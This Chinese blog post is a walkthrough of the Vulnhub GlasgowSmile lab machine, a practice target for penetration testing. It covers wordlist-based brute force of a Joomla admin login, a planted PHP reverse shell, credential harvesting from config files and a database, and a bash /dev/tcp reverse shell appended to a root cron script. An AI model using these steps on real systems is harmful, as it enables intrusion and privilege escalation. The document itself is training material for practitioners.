Vulnhub GlasgowSmile靶机渗透记录

最新推荐文章于 2024-06-06 09:36:43 发布
最新推荐文章于 2024-06-06 09:36:43 发布
阅读量1.2k 收藏 3
点赞数 3
分类专栏: Vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_43424471/article/details/109052482
版权

环境配置

镜像下载地址:http://www.vulnhub.com/entry/glasgow-smile-11,491/
目标:三个user.txt,root权限
Kali Linux IP: 192.168.1.128
GlasgowSmile IP: 192.168.1.142

信息收集

  • 利用netdiscover进行主机发现:
netdiscover -i 网卡设备名

netdiscover cmd
netdiscover result

  • 使用nmap进行端口扫描:
nmap -A -p- -sS 192.168.1.142

nmap result

  • 使用dirb对80端口的http服务进行目录遍历:
dirb http://192.168.1.142 /usr/share/wordlists/dirb/big.txt

dirb result
简单遍历一下就发现很多站点的目录文件信息,ta的CMS是joomla,接下来访问一下站点:

  • 访问http://192.168.1.142
    index_1
    站点主页面也没有特别的信息,源码也没有信息点。
  • 访问:http://192.168.1.142/joomlaindex_2
    第二个页面里面有小丑电影的台词,根据主页内容可以推测站主可能对小丑比较喜爱,可以尝试利用cewl用主页内容生成密码字典:
cewl http://192.168.1.142/joomla -m 5 -d 1 -w joker.txt

在这里插入图片描述
访问:http://192.168.1.142/joomla/administrator/index.php
joomla index

漏洞利用

后台登录界面,可以尝试利用Burpsuite爆破,用户名用joomla,密码字典利用刚刚生成的joker.txt:

  • 确定浏览器代理:
    proxy
  • 启用burpsuite爆破:
    burpsuite
    payload
    result
    拿到账号密码,账号:joomla ,密码:Gotham 登录后台:
    后台

GetShell

打开模块进行反弹shell编辑:
Templates
tmp
index getshell
编辑index.php,可以利用pentestmonkey里面的php webshell代码:
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
php_shell
编辑完之后进行save,然后打开nc监听,最后点击预览页面:

nc -lvp 4444

nc
get
getshell

权限提升

  • 利用python3打开一个bash终端:
python3 -c "import pty;pty.spawn('/bin/bash')"

tty

  • 去/home目录下查看用户的主目录,确认用户:
ls /home

ls home
可以看到三个用户主目录abner,penguin,rob

1. 权限提升rob:
目前用户是www-data,站点的用户,我们去/var/www/查看目录信息:
www
存在一个joomla2文件夹,查看一下:
joomla2
存在配置文件,cat一下内容:
conf
发现数据库账号密码,账号:joomla,密码:babyjoker,登录数据库查看:

mysql -u joomla -p

mysql
经过一番查找,在数据库batjoke下的taskforce表中下发现:
rob
将pswd进行base64解密:

echo 'Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/' | base64 -d

rob passwd
账号:rob 密码:???AllIHaveAreNegativeThoughts???

2. 权限提升abner
利用rob的账号进行ssh登录:
ssh
查看rob主目录内容:

cat user.txt

user1

cat howtoberoot

how

cat Abnerineedyourhelp

abner_help
观察内容发现纯英文,有空格,类似一封信,但是内容却无意义,考虑利用率rot13类似的加密算法,去https://gchq.github.io/CyberChef/对内容进行解密:
rot13
当偏移量为1时候内容有意思,对文章末尾的密码进行base64解码。

echo 'STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==' | base64 -d

abner
账号:abner,密码:I33hope99my0death000makes44more8cents00than0my0life0
利用su切换到abner用户:

3. 权限提升penguin
进入abner主目录查看信息:

cat user2.txt

user2

cat info.txt

info
是对Glasgow smile的介绍,全盘搜索与penguin用户相关的文件:

find / -iname *penguin* 2>/dev/null

find penguin
发现隐藏文件,查看文件详情:

ls -al /var/www/joomla2/administrator/manifests/files/

ls_penguin
属于abner的隐藏压缩文件,负责到用户主目录进行解压:

cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip ~ && unzip .dear_penguins.zip

利用abner的登录凭证解压:I33hope99my0death000makes44more8cents00than0my0life0
unzip
查看解压内容:
cat penguin
账号:penguin,密码:scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
利用su切换到penguin用户。

4. 权限提升root
进入penguin主目录查看内容:

penguin ls

cat user3.txt

user3.txt

cat PeopleAreStartingToNotice.txt

notice
结合文件内容,发现.trash_old属于用户penguin,root组并且任何人都可执行。
利用pspy对系统进程进行监控,以及对用户命令的执行进行枚举:
github:https://github.com/DominicBreuker/pspy

  • Kali在pspy目录下启动python http服务:
python -m SimpleHTTPServer 8080 &

pyhtp

  • 靶机通过wget下载pspy64:
wget http://192.168.1.128:8080/pspy64 -O pspy64

pspy64 get

  • 赋予执行权限并运行:
chmod +x pspy64 && ./pspy64 -p -i 1000

pspy64选项:
-p:启用输出命令到标准输出(默认启用)
-f:启用将文件系统事件打印到STDOUT(默认禁用)
-i:两次扫描procfs的时间间隔(单位:毫秒)
pspy
发现.trash_old 每一分钟一root权限运行一次,可以将反弹shell代码写入,让其自动执行:

echo "bash -c 'bash -i >& /dev/tcp/192.168.1.128/4444 0>&1'" >> .trash_old

并用vi编辑,将exit 0 用#注释:
get root
Kali启用nc监听等待自动连接:

nc -lvp 4444

root
拿到root权限完成渗透。

冰肌玉骨的老咸鱼
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Glasgow Smile
m0_46580995的博客
10-02 311
dirb 扫描目录发现 joomla joomscan扫一下 cewl -m 5 http://192.168.1.106/joomla/ > dic-words.txt 生成字典爆破用户名密码 得到joomla Gotham 登录后把index.php改成shell 访问并得到shell 在webconfig中·发现mysql用户名密码 登录mysql 找到rob登录密码ssh登录 找到一串rot13 再base64 更换用户 去网站根目录下枚举文件 看见一个隐藏文件 开启pythonhttp服务
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机GlasgowSmile
weixin_52450702的博客
10-28 472
靶机下载地址靶机 ip:192.168.70.159。
vulhub-Glasgow Smile:1.1
2201_75378806的博客
05-14 264
账号:penguin,密码:scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz。结合文件内容,发现.trash_old属于用户penguin,root组并且任何人都可执行。2>/dev/null 找与penguin有关的文件 -iname就是包含。我们之前查看/etc/passwd是由abner penguin rob三个用户的,AllIHaveAreNegativeThoughts?咱们想先去枚举一下joomla目录下有没有有凭证密码的文件。
Vulnhub-GlasgowSmile:v-1.1
cr7lyl的博客
12-25 1878
记一次vulnhub的通关过程 对主机全面扫描: 只有22和80端口开启 然后对其进行目录扫描,在扫描时访问web服务(8.
实战打靶集锦-021-glasgowsmile
阿尔泰野狼的博客
06-26 2005
本文记录了博主的一次曲折的打靶经历,其中包含了cewl构建密码字典、burp爆破用户、php构建反弹shell、base64解码、rot13解码、pspy64查看进程等手法
零基础打靶—Glasgow Smile靶场
最新发布
qq_61861243的博客
06-06 1243
10、将复制的shell脚本上传到/index.php中(全部替换),在第48行附近找到ip和port,将ip更改为攻击机的IP,端口可以自己设定(设定合理即可,这里为1234)之后在kali中打开监听 nc-1nvp 1234。12、去/var/www/目录查看有html和joomla2文件,查看joomla2文件,发现了configuration.php,查看该文件,发现了一个数据的用户名和密码。3、我访问Joomla站点,发现只有一个帖子,其中有电影“小丑”的两个场景对话,还发现一个登录窗口。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
pspy:在没有root权限的情况下监视linux进程
03-31
pspy-无特权Linux进程监听 pspy是一种命令行工具,旨在无需根权限就可以窥探进程。 它允许您在其他用户执行命令时查看它们,cron作业等。 非常适合枚举CTF中Linux系统。 很好地向您的同事展示为什么在命令行中将秘密作为参数传递是一个坏主意。 该工具从procfs扫描中收集信息。 放置在文件系统选定部分上的Inotify观察程序将触发这些扫描,以捕获短暂的进程。 入门 下载 将工具安装到要检查Linux机器上。 首先获取二进制文件。 在此处下载发布的二进制文件: 32位大,静态版本: pspy32 64位大,静态版本: pspy64 32位小版本: pspy32s 64位小版本: pspy64s 静态编译的文件应可在任何Linux系统上使用,但容量很大(〜4MB)。 如果有大小问题,请尝试较小的版本,该版本取决于libc并使用UPX(〜1MB)压缩。 建造 您可以使用系
Linux系统监控工具详解
3369的博客
09-26 474
系统监控: proc文件系统: proc文件系统是一种无存储的文件系统,当读其中的文件时,其内容动态生成,当写文件时,文件所关联的写函数被调用。每个proc文件都关联着字节特定的读写函数,因而它提供了另外的一种和内核通信的机制:内核部件可以通过该文件系统向用户空间提供接口来提供查询信息、修改软件行为,因而它是一种比较重要的特殊文件系统 由于proc文件系统以文件的形式向用户空间提供了访问接口,这些接口可以用于在运行时获取相关部件的信息或者修改部件的行为,因而它是非常方便的一个接口。内核中大量使用了该文件系统
djinn3 vulnhub 靶机渗透
mrwangtw的博客
01-21 3120
靶机ip10.0.2.45,攻击机ip10.0.2.4 扫描靶机端口 进入80端口,没发现什么可用的信息 进入5000端口,这里查看所有的title内容,没发现什么可用的信息,看了大佬的博客,发现可用的用户guest 访问31337端口,发现 考虑有nc命令访问端口,发现可用guest去登录,密码也是guest 这里发现这里增加和删除的ticket就是5000端口的内容 反复测试发现存在ssti漏洞 这里是判断ssti模板引擎的方法,具体内容在这...
Meta靶机
weixin_45007073的博客
02-28 1545
信息收集 发现目标主机只开放了ssh和web服务
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
weixin_62621015的博客
04-03 475
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
python3 -c ‘import pty;pty.spawn(“/bin/bash“)‘升级切换交互式shell
sweelg的博客
02-28 3635
python3 -c 'import pty;pty.spawn("/bin/bash")' export TERM=xterm Ctrl+Z stty -a stty raw -echo;fg reset stty rows 29 columns 94 row和columns数据为stty -a后的数据
升级tty shell (pyhotn)
冬萍子癸水
06-21 1325
渗透测试中,linux拿到的低权限shell,也就是老外说的initial foothold (shell)(能进入靶机或实战服务器了。。)。常常有很多限制。这种shell很容易不小心因按键给中断挂了,如果执行什么卡住了,你一按ctrl+c就直接挂完了,丢了。 如果按tab键,也不能自动补齐。。。等等,总之不是好shell 升级成tty 一般都是安装了Python的 操作如下: 中途会表面上断掉,以及你看不见你输入啥东西,没影响。 python -c 'import pty; pty.spawn("/bi
VulnHub靶场----grotesque3
qq_61670993的博客
10-19 441
本人小菜鸡,希望一起学习进步!
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值